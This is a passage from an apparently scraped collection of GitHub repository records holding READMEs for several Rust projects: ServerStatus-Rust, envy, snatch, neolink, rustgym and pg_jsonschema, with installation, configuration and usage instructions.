\n Cross-platform build notes\n\n```bash\n# dependencies for the Python client\n## Centos\nyum -y install epel-release\nyum -y install python3-pip gcc python3-devel\npython3 -m pip install psutil requests py-cpuinfo\n\n## Ubuntu/Debian\napt -y install python3-pip\npython3 -m pip install psutil requests py-cpuinfo\n\n## Alpine linux\napk add wget python3 py3-pip gcc python3-dev musl-dev linux-headers\napk add procps iproute2 coreutils\npython3 -m pip install psutil requests py-cpuinfo\n\nwget --no-check-certificate -qO stat_client.py 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/client/stat_client.py'\n\n## Windows\n# install Python 3.10 and set up the environment variables\n# run pip install psutil requests on the command line\n# download https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/client/stat_client.py\npip install psutil requests py-cpuinfo\n\npython3 stat_client.py -h\npython3 stat_client.py -a \"http://127.0.0.1:8080/report\" -u h1 -p p1\n```\n
\n\n## 5. Enabling `vnstat` support\n[vnstat](https://zh.wikipedia.org/wiki/VnStat) is a traffic accounting tool for Linux. With `vnstat` enabled, the `server` relies entirely on the client machine's `vnstat` data to display monthly and total traffic; the advantage is that traffic data survives restarts.\n\n
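To get a feel for the data the server ends up consuming, here is an illustrative sketch (not the project's actual code) that shells out to `vnstat --json m` and sums the monthly counters. It assumes `serde_json` as a dependency, and the field paths are assumptions too: vnstat's JSON layout differs between v1 and v2, so adapt them to your version:

```rust
use std::process::Command;

// Illustrative only: treat the JSON paths as assumptions, not a contract.
fn monthly_traffic() -> Result<(u64, u64), Box<dyn std::error::Error>> {
    let out = Command::new("vnstat").args(["--json", "m"]).output()?;
    let v: serde_json::Value = serde_json::from_slice(&out.stdout)?;

    let (mut rx, mut tx) = (0u64, 0u64);
    for iface in v["interfaces"].as_array().into_iter().flatten() {
        for month in iface["traffic"]["month"].as_array().into_iter().flatten() {
            rx += month["rx"].as_u64().unwrap_or(0);
            tx += month["tx"].as_u64().unwrap_or(0);
        }
    }
    Ok((rx, tx))
}

fn main() {
    match monthly_traffic() {
        Ok((rx, tx)) => println!("monthly rx={rx} tx={tx} (bytes in vnstat v2)"),
        Err(e) => eprintln!("vnstat probe failed: {e}"),
    }
}
```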
\n Enabling vnstat\n\n```bash\n# install vnstat on the client\n## Centos\nsudo yum install epel-release -y\nsudo yum install -y vnstat\n## Ubuntu/Debian\nsudo apt install -y vnstat\n\n# edit /etc/vnstat.conf\n# BandwidthDetection 0\n# MaxBandwidth 0\n# if your interface is not eth0, leave Interface empty so it is picked automatically\n# if there is no error you normally do not need to change it\n# Interface \"\"\nsystemctl restart vnstat\n\n# make sure version >= 2.6\nvnstat --version\n# check the monthly traffic (right after installing, it may take a little while to collect data)\nvnstat -m\nvnstat --json m\n\n# pass -n to the client to enable vnstat accounting\n./stat_client -a \"grpc://127.0.0.1:9394\" -u h1 -p p1 -n\n# or\npython3 stat_client.py -a \"http://127.0.0.1:8080/report\" -u h1 -p p1 -n\n```\n
\n\n## 6. FAQ\n\n
\n How to use a custom theme\n\nA simpler way \ud83d\udc49 [#37](https://github.com/zdz/ServerStatus-Rust/discussions/37)\n\n```nginx\nserver {\n # ssl, domain and other nginx settings go here\n\n # reverse-proxy /report requests\n location = /report {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\n proxy_set_header X-Forwarded-Proto $scheme;\n proxy_set_header X-Forwarded-Host $host;\n proxy_set_header X-Forwarded-Port $server_port;\n\n proxy_pass http://127.0.0.1:8080/report;\n }\n # reverse-proxy the json data requests\n location = /json/stats.json {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\n proxy_set_header X-Forwarded-Proto $scheme;\n proxy_set_header X-Forwarded-Host $host;\n proxy_set_header X-Forwarded-Port $server_port;\n\n proxy_pass http://127.0.0.1:8080/json/stats.json;\n }\n # since v1.4.0, /detail and /map need to be proxied the same way\n\n # everything else (html, js, css, ...) is served from local files\n location / {\n root /opt/ServerStatus/web; # the directory of your modified theme\n index index.html index.htm;\n }\n}\n```\n
\n\n
\n How to build from source\n\n```bash\n# install the rust toolchain, following the prompts\ncurl https://sh.rustup.rs -sSf | sh\nyum install -y openssl-devel\ngit clone https://github.com/zdz/ServerStatus-Rust.git\ncd ServerStatus-Rust\ncargo build --release\n# the built binaries end up in target/release\n```\n
\n\n
\n### How to customize the ping targets\n\n```bash\n# e.g. to use a custom China Mobile probe target, pass the address with --cm\n./stat_client -a \"grpc://127.0.0.1:9394\" -u h1 -p p1 --cm=cm.tz.cloudcpp.com:80\n\n# The China Telecom / China Unicom options can be listed with -h\n./stat_client -h\nOPTIONS:\n --cm China Mobile probe addr [default: cm.tz.cloudcpp.com:80]\n --ct China Telecom probe addr [default: ct.tz.cloudcpp.com:80]\n --cu China Unicom probe addr [default: cu.tz.cloudcpp.com:80]\n```\n
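\nThese probe addresses are essentially targets for a periodic TCP connect-latency measurement. The std-only sketch below illustrates the general idea; it is not the actual `stat_client` implementation, and it simply reuses the default China Mobile target from the help text above.\n\n```rust\nuse std::net::{TcpStream, ToSocketAddrs};\nuse std::time::{Duration, Instant};\n\n// Std-only sketch of what a probe target is used for: time a TCP connect\n// to host:port. Not the actual stat_client implementation.\nfn probe(addr: &str) -> std::io::Result<Duration> {\n    let target = addr\n        .to_socket_addrs()?\n        .next()\n        .ok_or_else(|| std::io::Error::new(std::io::ErrorKind::NotFound, \"no address resolved\"))?;\n    let start = Instant::now();\n    TcpStream::connect_timeout(&target, Duration::from_secs(3))?;\n    Ok(start.elapsed())\n}\n\nfn main() -> std::io::Result<()> {\n    println!(\"latency: {:?}\", probe(\"cm.tz.cloudcpp.com:80\")?);\n    Ok(())\n}\n```\n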
\n\n
\n### About this wheel\n\n I had been using `Prometheus` + `Grafana` + `Alertmanager` + `node_exporter` for VPS monitoring, which is also the mature monitoring stack in the industry. After using it for a while I found that, outside of production, most of the metrics go unused and the operations cost is a bit high.\n `ServerStatus`, on the other hand, is great: simple and lightweight enough to take in all your little machines at a glance. However, the `c++` version has not been iterated on for a long time, and some of my own needs were hard to retrofit onto the original; for example, the built-in `tcp` reporting is not very friendly to machines across regions, and it is inconvenient to optimize the reporting link. This is a small project for practicing `Rust`, so it will not grow complex features; it stays small and beautiful and simple to deploy, and together with [Uptime Kuma](https://github.com/louislam/uptime-kuma) it can cover most personal monitoring needs.\n\n
\n\n## 7. Related projects\n- https://github.com/BotoX/ServerStatus\n- https://github.com/cppla/ServerStatus\n- https://github.com/mojeda/ServerStatus\n- https://github.com/cokemine/ServerStatus-Hotaru\n- https://github.com/ToyoDAdoubiBackup/ServerStatus-Toyo\n\n## 8. Finally\n\n I am glad my code gets to run on your server; if it helps you, please leave a star \u2b50 to show your support.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "softprops/envy", "link": "https://github.com/softprops/envy", "tags": ["rust", "serde", "envy", "configuration", "env", "12-factor"], "stars": 658, "description": "deserialize env vars into typesafe structs with rust", "lang": "Rust", "repo_lang": "", "readme": "# envy [![Github Actions](https://github.com/softprops/envy/workflows/Main/badge.svg)](https://github.com/softprops/envy/actions) [![Coverage Status](https://coveralls.io/repos/github/softprops/envy/badge.svg?branch=master)](https://coveralls.io/github/softprops/envy?branch=master) [![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE) [![crates.io](http://meritbadge.herokuapp.com/envy)](https://crates.io/crates/envy) [![Latest API docs](https://img.shields.io/badge/docs-latest-green.svg)](https://softprops.github.io/envy)\n\n> deserialize environment variables into typesafe structs\n\n## \ud83d\udce6 install\n\nAdd the following to your `Cargo.toml` file.\n\n```toml\n[dependencies]\nenvy = \"0.4\"\n```\n\n## \ud83e\udd38 usage\n\nA typical envy usage looks like the following. Assuming your rust program looks something like this...\n\n> \ud83d\udca1 These examples use Serde's [derive feature](https://serde.rs/derive.html)\n\n```rust\nuse serde::Deserialize;\n\n#[derive(Deserialize, Debug)]\nstruct Config {\n foo: u16,\n bar: bool,\n baz: String,\n boom: Option<String>\n}\n\nfn main() {\n match envy::from_env::<Config>() {\n Ok(config) => println!(\"{:#?}\", config),\n Err(error) => panic!(\"{:#?}\", error)\n }\n}\n```\n\n... export some environment variables\n\n```bash\n$ FOO=8080 BAR=true BAZ=hello yourapp\n```\n\nYou should be able to access a completely typesafe config struct deserialized from env vars.\n\nEnvy assumes an env var exists for each struct field with a matching name in all uppercase letters. i.e. 
A struct field `foo_bar` would map to an env var named `FOO_BAR`.\n\nStructs with `Option` type fields will successfully be deserialized when their associated env var is absent.\n\nEnvy also supports deserializing `Vecs` from comma separated env var values.\n\nBecause envy is built on top of serde, you can use all of serde's [attributes](https://serde.rs/attributes.html) to your advantage.\n\nFor instance let's say your app requires a field but would like a sensible default when one is not provided.\n```rust\n\n/// provides default value for zoom if ZOOM env var is not set\nfn default_zoom() -> u16 {\n 32\n}\n\n#[derive(Deserialize, Debug)]\nstruct Config {\n foo: u16,\n bar: bool,\n baz: String,\n boom: Option<String>,\n #[serde(default=\"default_zoom\")]\n zoom: u16\n}\n```\n\nThe following will yield an application configured with a zoom of 32\n\n```bash\n$ FOO=8080 BAR=true BAZ=hello yourapp\n```\n\nThe following will yield an application configured with a zoom of 10\n\n```bash\n$ FOO=8080 BAR=true BAZ=hello ZOOM=10 yourapp\n```\n\nThe common pattern of prefixing env var names for a specific app is supported using\nthe `envy::prefixed(prefix)` interface. Assuming your env vars are prefixed with `APP_`\nthe above example may instead look like\n\n```rust\nuse serde::Deserialize;\n\n#[derive(Deserialize, Debug)]\nstruct Config {\n foo: u16,\n bar: bool,\n baz: String,\n boom: Option<String>\n}\n\nfn main() {\n match envy::prefixed(\"APP_\").from_env::<Config>() {\n Ok(config) => println!(\"{:#?}\", config),\n Err(error) => panic!(\"{:#?}\", error)\n }\n}\n```\n\nthe expectation would then be to export the same environment variables prefixed with `APP_`\n\n```bash\n$ APP_FOO=8080 APP_BAR=true APP_BAZ=hello yourapp\n```\n\n> \ud83d\udc6d Consider this crate a cousin of [envy-store](https://github.com/softprops/envy-store), a crate for deserializing AWS parameter store values into typesafe structs and [recap](https://github.com/softprops/recap), a crate for deserializing named regex capture groups into typesafe structs.\n\nDoug Tangren (softprops) 2016-2019\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "derniercri/snatch", "link": "https://github.com/derniercri/snatch", "tags": ["rust", "downloader", "accelerator", "side-project", "awesome"], "stars": 658, "description": "A simple, fast and interruptable download accelerator, written in Rust", "lang": "Rust", "repo_lang": "", "readme": " ![build status](https://api.travis-ci.org/derniercri/snatch.svg?branch=devel)\n\n# snatch\nA simple, fast and interruptable download accelerator, written in Rust\n\n## WARNING\n\n**This project is no longer maintained by @k0pernicus and @jean-serge.** \n**Instead of Snatch, you can use, report features or issues and/or contribute to [Zou](https://github.com/k0pernicus/zou).**\n\n![Snatch logo](./img/snatch-horizontal.png)\n\n(A special thanks to [@fh-d](https://github.com/fh-d) for this awesome logo !)\n\n## Current features\n\n* **Simple**: a command line tool to easily manage your downloads ;\n* **Fast**: multithreading support.\n\n**NOTE**: _Snatch_ is on _alpha_ version. This version runs well on remote contents with a length known **before** the download (with the `content-length` header from the server response) - also, the _Interruptable_ feature is not implemented yet.\n\n## Installation\n\n1. Install Rust and Cargo using [rustup](https://www.rustup.rs/) ;\n2. 
You can download two versions of _Snatch_ : \n * the latest build from [crates.io](https://crates.io/): `cargo install\n snatch` ;\n * the last commit version from Github: `cargo install --git https://github.com/derniercri/snatch.git --branch devel` ;\n3. Enjoy !\n\n## Usage\n\n```\nSnatch 0.1.2\nSnatch, a simple, fast and interruptable download accelerator, written in Rust.\n\nUSAGE:\n snatch [FLAGS] [OPTIONS] \n\nFLAGS:\n -d, --debug Activate the debug mode\n --force Assume Yes to all queries and do not prompt\n -h, --help Prints help information\n -V, --version Prints version information\n\nOPTIONS:\n -f, --file The local file to save the remote content file\n -t, --threads Threads which can be used to download\n\nARGS:\n \n```\n\n## Screenshot\n\n![example](./img/snatch_devel.gif)\n\n## File examples\n\n* [A simple PDF file](http://www.cbu.edu.zm/downloads/pdf-sample.pdf)\n* [Big Buck Bunny](http://distribution.bbb3d.renderfarming.net/video/mp4/bbb_sunflower_1080p_60fps_stereo_abl.mp4), a big free mp4 file\n* [The cat DNA](http://hgdownload.cse.ucsc.edu/goldenPath/felCat8/bigZips/felCat8.fa.gz), a big .gz file\n* [A big PDF file from Princeton](http://scholar.princeton.edu/sites/default/files/oversize_pdf_test_0.pdf)\n\n## Contributing\n\nYou want to contribute to _Snatch_ ?\nHere are a few ways you can help us out :\n\n* improve the documentation,\n* improve the CLI,\n* add new features (please to see our issues),\n* report bugs.\n\nIf you want to create a pull request, this is the procedure to make it great:\n\n* create an issue to explain the problem you encountered (except for typo),\n* fork the project,\n* create a local branch to make changes (from our `devel` branch),\n* test your changes,\n* create a pull request (please compare it with our `devel` branch),\n* explain your changes,\n* submit !\n\nThank you for your interest in contributing to _Snatch_ ! :-D\n\n## Changelogs\n\n* 0.1.3 (**current**)\n * Fix the behaviour to know if the download is OK or not\n * Delete automatically the file if the download is not OK\n * Fix the behaviour when downloading a file using zero thread (yes, that was possible...)\n * Fix the behaviour when downloading a file using one thread\n * Monothreading download if the remote server does not support PartialContent headers\n\n* 0.1.2 (`2ee85c151167770ce0a71245e72c02497625087f`) \n No changelogs reported\n \n* 0.1.1 (`624a59d23e28d369bae2f9d30ea22db197f7e729`) \n No changelogs reported\n\n* 0.1.0 \n No changelogs reported\n\n## Build issues\n\n* Libraries cannot be build\nPlease go check if you are using the latest version of `rustc` (stable), running `rustup update`.\n\n* `fatal error: 'openssl/hmac.h' file not found`\nIf you are on a GNU/Linux distribution (like Ubuntu), please install `libssl-dev`.\nIf you are on macOS, please install `openssl` and check your OpenSSL configuration:\n\n```\nbrew install openssl\nexport OPENSSL_INCLUDE_DIR=`brew --prefix openssl`/include\nexport OPENSSL_LIB_DIR=`brew --prefix openssl`/lib\nexport DEP_OPENSSL_INCLUDE=`brew --prefix openssl`/include\n```\n", "readme_type": "markdown", "hn_comments": "Downloading from several mirrors at once makes sense, but using \"download accelerators\" to cheat on TCP congestion control is just wrong. Some mirrors will even ban you for making more than 4 connections at once.Wow, does download accelerators still exist? I remember using them back in the days on my 56k modem. 
I guess it still makes sense though if your home internet is faster than what the server allows per connection. Usually you don't need it anyway because today most things are already fast enough.Prozilla[1] is still one of the best and tiniest download managers I've ever seen. Blazingly fast. Squeezes as much speed as allowed by your ISP if throttled.[1] https://github.com/totosugito/prozilla-2.0.4> Fast: written in a new exciting programing language ;IMO change this description, it's rather strange...You can use prettier progress bar symbols, in terminals which support Unicode.See https://en.wikipedia.org/wiki/List_of_Unicode_characters#Blo...It's product names like this that discourage young women from going into computer science.If you are serious, you can alternately use aria2 https://aria2.github.io/. Aria2 has been around for a long time and is quite robust and feature complete. It makes a compelling replacement for curl and wget.Its 2017 do we really need download accelerators? I remember them from 10 years ago when you really could get more out of your connection or more like more from the servers by downloading multiple chucks at once.Looks like someone is exited to code in Rust, thats great but I see no need for this.My biggest pet peeve with projects is when the feature list is actually a mix of features and things that are \"upcoming\"/\"to be supported.\" This feature list isn't really a feature list either: it's just \"simple\" and \"fast\" (but fast is just 'written in a new exciting programming language'). Interruption and resuming is the first actual feature, but that's \"soon.\"Feature lists should be feature lists. On open source projects especially, I've seen \"soon\" take weeks or months. Move features that aren't features into a \"upcoming\" or \"planned\" block or make an issue, but don't list it as a feature when it isn't implemented.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thirtythreeforty/neolink", "link": "https://github.com/thirtythreeforty/neolink", "tags": ["rtsp", "rtsp-server", "reolink"], "stars": 658, "description": "An RTSP bridge to Reolink IP cameras", "lang": "Rust", "repo_lang": "", "readme": "# Neolink\n\n![CI](https://github.com/thirtythreeforty/neolink/workflows/CI/badge.svg)\n\nNeolink is a small program that acts as a proxy between Reolink IP cameras and\nnormal RTSP clients.\nCertain cameras, such as the Reolink B800, do not implement ONVIF or RTSP, but\ninstead use a proprietary \"Baichuan\" protocol only compatible with their apps\nand NVRs (any camera that uses \"port 9000\" will likely be using this protocol).\nNeolink allows you to use NVR software such as Shinobi or Blue Iris to receive\nvideo from these cameras instead.\nThe Reolink NVR is not required, and the cameras are unmodified.\nYour NVR software connects to Neolink, which forwards the video stream from the\ncamera.\n\nThe Neolink project is not affiliated with Reolink in any way; everything it\ndoes has been reverse engineered.\n\n## Supported cameras\n\nNeolink intends to support all Reolink cameras that do not provide native RTSP.\nCurrently it has been tested on the following cameras:\n\n- B800/D800\n- B400/D400\n- E1\n- Lumus\n- 510A\n\nNeolink does not support other cameras such as the RLC-420, since they already\n[provide native RTSP](https://support.reolink.com/hc/en-us/articles/360007010473-How-to-Live-View-Reolink-Cameras-via-VLC-Media-Player).\n\n## Usage\n\n1. First, write a configuration yaml file describing your cameras. 
See the\nConfiguration section below or the provided sample config.\n\n2. Launch Neolink:\n```bash\nneolink rtsp --config=your_config.yaml\n```\n\n3. Then, connect your RTSP viewer to `rtsp://127.0.0.1:8554/your_camera_name`!\n\n### Additional commands\n\nNeolink also has some additional command line tools\nfor controlling the camera. They are all used through neolink subcommands like this:\n\n```bash\nneolink subcommand --config=...\n```\n\nThe currently supported subcommands are\n\n- **rtsp**: The standard neolink rtsp bridge\n- **status-light**: Control the LED status light\n- **reboot**: Reboot a camera\n- **talk**: Enable talk back through either the microphone or by\n reading a sound file.\n\nFor a full list of commands use `neolink help`, or use\n`neolink help ` for details on a subcommand of interest.\n\n## Download & Installation\n\nBuilds are provided for the following platforms:\n\n- Windows x86_64 ([download][win-ci-download])\n- macOS x86_64 ([download][macos-ci-download])\n- Ubuntu/Debian x86_64 ([download][ubuntu-ci-download])\n- Ubuntu/Debian x86 ([download][debian-x86-ci-download])\n- Debian aarch64 (Raspberry Pi 64-bit) ([download][debian-aarch-ci-download])\n- Debian armhf (Raspberry Pi 32-bit) ([download][debian-armhf-ci-download])\n- Arch Linux ([AUR](https://aur.archlinux.org/packages/neolink-git/))\n- Docker x86 (see below)\n\n### Windows/Linux\n\n1. [Install Gstreamer][gstreamer] from the most recent MSI installer on Windows,\nor your package manager on Linux.\n\n On Ubuntu/Debian machines gstreamer can be installed with:\n\n ```bash\n sudo apt install \\\n libgstrtspserver-1.0-0 \\\n libgstreamer1.0-0 \\\n libgstreamer-plugins-bad1.0-0 \\\n gstreamer1.0-plugins-good \\\n gstreamer1.0-plugins-bad\n ```\n\n\n2. If you are using Windows, add the following to your `PATH` environment variable:\n\n ```\n %GSTREAMER_1_0_ROOT_X86_64%\\bin\n ```\n\n **Note:** If you use Chocolatey to install Gstreamer, it does this\n automatically.\n\n3. Download and unpack Neolink from the links above.\n 1. Note: you can also click on [this link][ci-download] to see all historical builds.\n You will need to be logged in to GitHub to download directly from the builds page (wget doesn't work)\n\n Ubuntu/Debian/Raspberry Pi OS example:\n\n ```bash\n unzip release-arm64-buster.zip\n sudo cp neolink /usr/local/bin/\n sudo chmod +x /usr/local/bin/neolink\n ```\n\n4. Write a configuration file for your cameras. See the section below.\n\n5. Launch Neolink from a shell, passing your configuration file:\n\n ```bash\n neolink rtsp --config my_config.toml\n ```\n\n6. 
Connect your NVR software to Neolink's RTSP server.\n\n The default URL is `rtsp://127.0.0.1:8554/your_camera_name` if you're running\n it on the same computer.\n If you run it on a different server, you may need to open firewall ports.\n See the \"Viewing\" section below for more troubleshooting.\n\n[gstreamer]: https://gstreamer.freedesktop.org/documentation/installing/index.html\n[ci-download]: https://github.com/thirtythreeforty/neolink/actions?query=workflow%3ACI+branch%3Amaster+\n\n[win-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-windows-2022.zip\n[macos-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-macos-12.zip\n[ubuntu-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-ubuntu-20.04.zip\n[debian-x86-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-i386-buster.zip\n[debian-armhf-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-armhf-buster.zip\n[debian-aarch-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-arm64-buster.zip\n\n### Docker\n\nA Docker image is also available containing Neolink and all its dependencies.\nThe image is `thirtythreeforty/neolink`.\nPort 8554 is exposed, which is the default listen port.\nYou must mount a configuration file (see below) into the container at\n`/etc/neolink.toml`.\n\nHere is a sample launch commmand:\n\n```bash\ndocker run \\\n -p 8554:8554 \\\n --restart=on-failure \\\n --volume=$PWD/config.toml:/etc/neolink.toml \\\n thirtythreeforty/neolink\n```\n\nHere is an example docker-compose:\n\n```yml\n---\nversion: \"2\"\nservices:\n neolink:\n image: thirtythreeforty/neolink\n container_name: neolink\n ports:\n - 8554:8554\n volumes:\n - $PWD/neolink.toml:/etc/neolink.toml\n restart: unless-stopped\n```\n\nThe Docker image is \"best effort\" and intended for advanced users; questions\nabout running Docker are outside the scope of Neolink.\n\nIf you use a battery-powered camera (or other UDP-only camera) you will need to either\nuse `--net=host` or setup a [macvlan](https://docs.docker.com/network/macvlan/)\nfor the docker image that supports UDP broadcast.\nThis is because UDP requires that udp broadcast messages are transmitted across\nthe docker network interface, however this is [not possible in the default\nbridging mode](https://github.com/docker/for-linux/issues/637)\n\n\n## Configuration\n\n**Note**: for a more comprehensive setup tutorial, refer to the\n[Blue Iris setup walkthrough in `docs/`][blue-iris-setup] (which is probably\n also helpful even with other NVR software).\n\n**Note**: more comprehensive setup details for linux based devices is provided in\n[docs/unix_setup.md][unix-setup]\n\n**Note**: instructions for also setting up a (systemd based) service for linux\nbased devices is provided in [docs/unix_service.md][unix-service]\n\n[blue-iris-setup]: docs/Setting%20Up%20Neolink%20For%20Use%20With%20Blue%20Iris.md\n[unix-setup]: docs/unix_setup.md\n[unix-service]: docs/unix_service.md\n\nCopy and modify the `sample_config.toml` to specify the address, username, and\npassword for each camera (if there is no password, you can omit that line).\nThe default credentials for some cameras is username `admin` password `123456`.\n\n- For a non battery powered camera you need to provide the address field with the\nip and port (default 9000).\n\n- For a battery powered camera you need to 
provide the uid field with the\ncamera's UID. In this case your network must support UDP.\nBattery cameras exclusively use this UDP mode so you must always use a UID.\n\nEach `[[cameras]]` block creates a new camera; the `name` determines the RTSP\npath you should connect your client to.\n\nBy default, the HD stream is available at the RTSP path `/name` or\n`/name/mainStream`, and the SD stream is available at `/name/subStream`.\nYou can use only the HD stream by adding `stream = \"mainStream\"` to the\n`[[cameras]]` config, or only the SD stream with `stream = \"subStream\"`.\n\n**Note**: The B400/D400 models only support a single stream at a time, so you\nmust add this line to sections for those cameras.\n\nBy default Neolink serves on all IP addresses on port 8554.\nYou can modify this by changing the `bind` and the `bind_port` parameter.\nYou only need one `bind`/`bind_port` setting at the top of the config file.\n\nYou can enable `rtsps` (TLS) by adding a `certificate = \"/path/to/pem\"` to the\ntop section of the config file. This PEM should contain the certificate\nand the key used for the server. If TLS is enabled all connections must use\n`rtsps`. You can also use client side TLS with the config option\n`tls_client_auth = \"none|request|require\"`; in this case the client should\npresent a certificate signed by the server's CA.\n\nTLS is disabled by default.\n\nYou can password-protect the Neolink server by adding `[[users]]` sections to\nthe configuration file, but this is not secure without also using TLS:\n\n```\n[[users]]\nname: someone\npass: somepass\n```\n\nyou also need to add the allowed users into each camera by adding the following\nto `[[cameras]]`.\n\n```\npermitted_users = [\"someone\", \"someoneelse\"]\n```\n\nAnywhere a username is accepted it can take any username or one of the\nfollowing special values.\n\n- `anyone` means any user with a valid user/pass\n- `anonymous` means no user/pass required\n\nThe default `permitted_users` list is:\n\n- `[ \"anonymous\"]` if no `[[users]]` were given in the config meaning no\nauthentication required to connect.\n\n- `[ \"anyone\" ]` if `[[users]]` were provided meaning any authourised users can\nconnect.\n\nYou can change the Neolink log level by setting the `RUST_LOG` environment\nvariable (not in the configuration file) to one of `error`, `warn`, `info`,\n`debug`, or `trace`:\n\n- On sh:\n\n```sh\nset RUST_LOG=debug\n```\n\n- On Bash:\n\n```bash\nexport RUST_LOG=debug\n```\n\n## Viewing\n\nConnect your RTSP client to the stream with the name you provided in the\nconfiguration file.\n\nAgain, the default URL is `rtsp://127.0.0.1:8554/your_camera_name` if you're\nrunning it on the same computer as the client.\nThe smaller SD video is `rtsp://127.0.0.1:8554/your_camera_name/subStream`.\n\n4K cameras send large video \"key frames\" once every few seconds and the client\nmust have a receive buffer large enough to store the entire frame.\nIf your client's buffer size is configurable (like Blue Iris), ensure it's set\nto 20MB, which should ensure plenty of headroom.\n\n## Stability\n\nNeolink has had minimal testing, but it seems to be very reliable in multiple\nusers' testing.\n\nThe formats of all configuration files and APIs is subject to change as required\nwhile it is pre-1.0.\n\n## Development\n\nNeolink is written in Rust, and binds to Gstreamer to provide RTSP server\nfunctionality.\n\nTo compile, ensure you have the Rust compiler, Gstreamer, and gst-rtsp-server\ninstalled.\n\nThen simply run:\n\n```bash\ncargo 
build\n```\n\nfrom this top directory.\n\n### Baichuan Protocol\n\nThe \"port 9000\" protocol used by Reolink and some Swann cameras is internally\nreferred to as the Baichuan protocol; this is the company based in China that\nis known internationally as Reolink.\n\nThis protocol is a slightly convoluted header-data format, and appears to have\nbeen upgraded several times.\n\nThe modern variant uses obfuscated XML commands and sends ordinary H.265 or\nH.264 video streams encapsulated in a custom header.\n\nMore details of the on-the-wire protocol are provided in [`dissector/`](dissector/).\n\n### Baichuan dissector\n\nA Wireshark dissector is available for the BC wire protocol in the `dissector`\ndirectory.\n\nIt dissects the BC header and also allows viewing the deobfuscated XML in\ncommand messages.\n(It cannot deobfuscate newer messages that use AES encryption.)\nTo use it, copy or symlink it into your Wireshark plugin directory; typically\nthis is `~/.local/lib/wireshark/plugins/` under Linux.\n\nCurrently the dissector does not attempt to decode the Baichuan \"extension\"\nmessages except `binaryData`.\nThis will change in the future as reverse engineering needs require.\n\n## License\n\nNeolink is free software, released under the GNU Affero General Public License\nv3.\n\nThis means that if you incorporate it into a piece of software available over\nthe network, you must offer that software's source code to your users.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "warycat/rustgym", "link": "https://github.com/warycat/rustgym", "tags": ["leetcode", "rust", "solutions", "macros", "leetcode-rust", "algorithm", "interview", "interview-questions", "interview-preparation", "interview-practice", "trie", "leetcode-solutions", "graph", "tutorial", "hackerrank", "hackerrank-solutions", "advent-of-code"], "stars": 658, "description": "Leetcode Solutions in Rust, Advent of Code Solutions in Rust and more", "lang": "Rust", "repo_lang": "", "readme": "[package]\nname = \"rustgym-readme\"\nversion = \"0.1.0\"\nauthors = [\"Yinchu Xia \"]\nedition = \"2018\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n[dependencies]\nanyhow = \"1.0.35\"\naskama = \"0.10.5\"\nderive-new = \"0.5.8\"\nregex = \"1.4.2\"\nreqwest = { version = \"0.10.7\", features = [\"blocking\", \"json\"] }\nrustgym-consts = { path = \"../consts\" }\nrustgym-schema = { path = \"../schema\" }\nrustgym-util = { path = \"../util\" }\nserde_json = \"1.0.60\"\nwalkdir = \"2.3.1\"\ndiesel = { version = \"1.4.8\", features = [\n \"sqlite\",\n \"r2d2\",\n \"chrono\",\n \"uuidv07\"\n] }\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "supabase/pg_jsonschema", "link": "https://github.com/supabase/pg_jsonschema", "tags": [], "stars": 657, "description": "PostgreSQL extension providing JSON Schema validation", "lang": "Rust", "repo_lang": "", "readme": "# pg_jsonschema\n\n

\n\"PostgreSQL\n\"License\"\n\n

\n\n---\n\n**Source Code**: https://github.com/supabase/pg_jsonschema\n\n---\n\n## Summary\n\n`pg_jsonschema` is a PostgreSQL extension adding support for [JSON schema](https://json-schema.org/) validation on `json` and `jsonb` data types.\n\n\n## API\nSQL functions:\n\n```sql\n-- Validates a json *instance* against a *schema*\njson_matches_schema(schema json, instance json) returns bool\n```\nand \n```sql\n-- Validates a jsonb *instance* against a *schema*\njsonb_matches_schema(schema json, instance jsonb) returns bool\n```\n\n## Usage\nThose functions can be used to constrain `json` and `jsonb` columns to conform to a schema.\n\nFor example:\n```sql\ncreate extension pg_jsonschema;\n\ncreate table customer(\n id serial primary key,\n ...\n metadata json,\n\n check (\n json_matches_schema(\n '{\n \"type\": \"object\",\n \"properties\": {\n \"tags\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"maxLength\": 16\n }\n }\n }\n }',\n metadata\n )\n )\n);\n\n-- Example: Valid Payload\ninsert into customer(metadata)\nvalues ('{\"tags\": [\"vip\", \"darkmode-ui\"]}');\n-- Result:\n-- INSERT 0 1\n\n-- Example: Invalid Payload\ninsert into customer(metadata)\nvalues ('{\"tags\": [1, 3]}');\n-- Result:\n-- ERROR: new row for relation \"customer\" violates check constraint \"customer_metadata_check\"\n-- DETAIL: Failing row contains (2, {\"tags\": [1, 3]}).\n```\n\n## JSON Schema Support\n\npg_jsonschema is a (very) thin wrapper around the [jsonschema](https://docs.rs/jsonschema/latest/jsonschema/) rust crate. Visit their docs for full details on which drafts of the JSON Schema spec are supported.\n\n## Try it Out\n\nSpin up Postgres with pg_jsonschema installed in a docker container via `docker-compose up`. The database is available at `postgresql://postgres:password@localhost:5407/app`\n\n\n## Installation\n\n\nRequires:\n- [pgx](https://github.com/tcdi/pgx)\n\n\n```shell\ncargo pgx 